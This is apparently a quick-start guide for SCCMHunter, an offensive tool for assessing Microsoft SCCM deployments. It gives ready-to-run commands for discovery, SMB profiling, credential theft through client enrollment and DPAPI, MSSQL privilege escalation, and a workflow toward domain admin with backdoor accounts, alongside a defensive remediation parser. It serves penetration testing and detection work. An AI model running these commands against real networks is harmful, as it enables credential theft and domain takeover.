This guide walks you through a complete SCCM assessment workflow using SCCMHunter, from initial discovery to exploitation and post-exploitation activities.
This quick start assumes you have already completed the installation process and have valid domain credentials.

Assessment Workflow

Step 1: LDAP Discovery

Start by discovering SCCM infrastructure in the target domain:
python3 sccmhunter.py find -d contoso.com -dc-ip 192.168.1.10 -u lowpriv -p password
[+] Beginning SCCM Infrastructure Discovery
[+] Checking for Schema Extension Objects
    [+] Found System Management Container
    [+] DACL Analysis Complete - 3 computers with FullControl
[+] Checking for Management Points
    [+] Found Management Point: SCCM01.contoso.com
    [+] Found Management Point: SCCM02.contoso.com
[+] Checking for Distribution Points
    [+] Found PXE-Enabled DP: PXE01.contoso.com
[+] Keyword Search Results
    [+] Found 15 objects containing 'SCCM'
    [+] Found 8 objects containing 'MECM'

Step 2: SMB Profiling

Profile the discovered targets to understand their roles and attack surface:
python3 sccmhunter.py smb -d contoso.com -u lowpriv -p password
[+] Beginning SMB Profiling
[+] Target: SCCM01.contoso.com
    [+] SMB Signing: Disabled
    [+] SCCM Role: Site Server
    [+] MSSQL Service: Running
    [+] SMS Provider: True
    [+] Default Shares: SMS_DP$, SMS_PKG$
[+] Target: PXE01.contoso.com
    [+] SMB Signing: Enabled
    [+] SCCM Role: Distribution Point
    [+] PXE Variables: Available
    [+] Default Shares: REMINST

Step 3: Target Analysis

Review the discovery and profiling results to identify attack vectors:
python3 sccmhunter.py show -j results.json

Target Prioritization

High Priority Targets:
  • Site Servers with SMB signing disabled
  • Management Points with exposed HTTP services
  • Distribution Points with PXE variables
  • MSSQL instances with site database access
Attack Vectors to Consider:
  • HTTP client enrollment for credential theft
  • MSSQL relay attacks for privilege escalation
  • DPAPI extraction from Distribution Points
  • SMB relay attacks against unsigned targets
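Added here as a worked example (not SCCMHunter's own code): a small Python parser for the smb profile format shown in Step 2 that turns the High Priority conditions above into a remediation list a defender can act on. The sample output is constructed from the Step 2 listing, and the fixes are the standard mitigations for each finding.

```python
import re

# Constructed sample shaped like the smb module output shown above (not real scan data).
SAMPLE_SMB_OUTPUT = """\
[+] Beginning SMB Profiling
[+] Target: SCCM01.contoso.com
    [+] SMB Signing: Disabled
    [+] SCCM Role: Site Server
    [+] MSSQL Service: Running
    [+] SMS Provider: True
    [+] Default Shares: SMS_DP$, SMS_PKG$
[+] Target: PXE01.contoso.com
    [+] SMB Signing: Enabled
    [+] SCCM Role: Distribution Point
    [+] PXE Variables: Available
    [+] Default Shares: REMINST
"""

TARGET_RE = re.compile(r"^\[\+\] Target: (\S+)\s*$")
ATTR_RE = re.compile(r"^\s+\[\+\] ([^:]+): (.+?)\s*$")

def parse_smb_profile(text):
    """Group each indented '[+] key: value' line under the preceding '[+] Target:' host."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = TARGET_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {}
            continue
        m = ATTR_RE.match(line)
        if m and current is not None:
            hosts[current][m.group(1).strip()] = m.group(2)
    return hosts

def hardening_gaps(hosts):
    """Apply the High Priority conditions above; each hit is (host, finding, fix)."""
    gaps = []
    for host, a in hosts.items():
        if a.get("SMB Signing") == "Disabled":
            gaps.append((host, "SMB signing disabled", "require SMB signing on this host"))
        if a.get("SCCM Role") == "Site Server" and a.get("MSSQL Service") == "Running":
            gaps.append((host, "site database exposed on the site server",
                         "restrict access to the SQL port to site systems only"))
        if a.get("PXE Variables") == "Available":
            gaps.append((host, "PXE variables exposed",
                         "require a PXE password or disable PXE where it is not needed"))
    # Site servers first: a compromise there has the highest impact.
    return sorted(gaps, key=lambda g: hosts[g[0]].get("SCCM Role") != "Site Server")
```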

Step 4: Exploitation

Option A: HTTP Client Enrollment

Target HTTP-based client enrollment for credential extraction:
python3 sccmhunter.py http -d contoso.com -u lowpriv -p password -target SCCM01.contoso.com

Option B: MSSQL Privilege Escalation

Leverage MSSQL access for privilege escalation:
python3 sccmhunter.py mssql -d contoso.com -u lowpriv -p password -target SCCM01.contoso.com

Option C: DPAPI Secret Extraction

Extract Network Access Account credentials:
python3 sccmhunter.py dpapi -d contoso.com -u lowpriv -p password -target PXE01.contoso.com

Step 5: Post-Exploitation

If you’ve successfully gained administrative access, use the admin module:
python3 sccmhunter.py admin -u administrator -p newpassword -ip SCCM01.contoso.com

Common Workflows

Objective: Gain domain admin through SCCM compromise
  1. Discovery: find module to map SCCM infrastructure
  2. Profiling: smb module to identify attack surface
  3. Exploitation: http or mssql modules for initial access
  4. Escalation: admin module for privilege escalation
  5. Persistence: Create backdoor accounts and maintain access
Objective: Assess SCCM security posture
  1. Enumeration: Comprehensive discovery with all modules
  2. Vulnerability Assessment: Identify misconfigurations and weaknesses
  3. Proof of Concept: Demonstrate exploitability without damage
  4. Documentation: Export results for detailed reporting
  5. Remediation: Provide specific hardening recommendations
Objective: Test detection capabilities
  1. Baseline: Establish normal SCCM activity patterns
  2. Attack Simulation: Execute controlled attack scenarios
  3. Detection Analysis: Verify security monitoring effectiveness
  4. Tuning: Adjust detection rules and monitoring systems
  5. Validation: Re-test to confirm improved detection

Troubleshooting Common Issues

Symptoms: “Authentication failed” or “Access denied” errors
Solutions:
  • Verify credentials are correct and account is not locked
  • Check domain name format (use FQDN)
  • Try different authentication methods (-k for Kerberos)
  • Ensure network connectivity to domain controller
Symptoms: Empty results from find module
Solutions:
  • Verify you’re targeting the correct domain
  • Check if SCCM is actually deployed in the environment
  • Try the -resolve flag for nested group enumeration
  • Confirm you have appropriate LDAP read permissions
Symptoms: SMB profiling fails or times out
Solutions:
  • Check SMB signing requirements and compatibility
  • Verify network connectivity and firewall rules
  • Try reducing thread count with -threads parameter
  • Use specific target lists instead of broad scanning

Best Practices

Operational Security

  • Test in Labs First: Always validate techniques in controlled environments
  • Minimize Impact: Use read-only operations when possible during assessments
  • Document Everything: Maintain detailed logs of activities and findings
  • Coordinate with Teams: Communicate with IT and security teams during authorized testing
  • Clean Up: Remove any temporary artifacts created during testing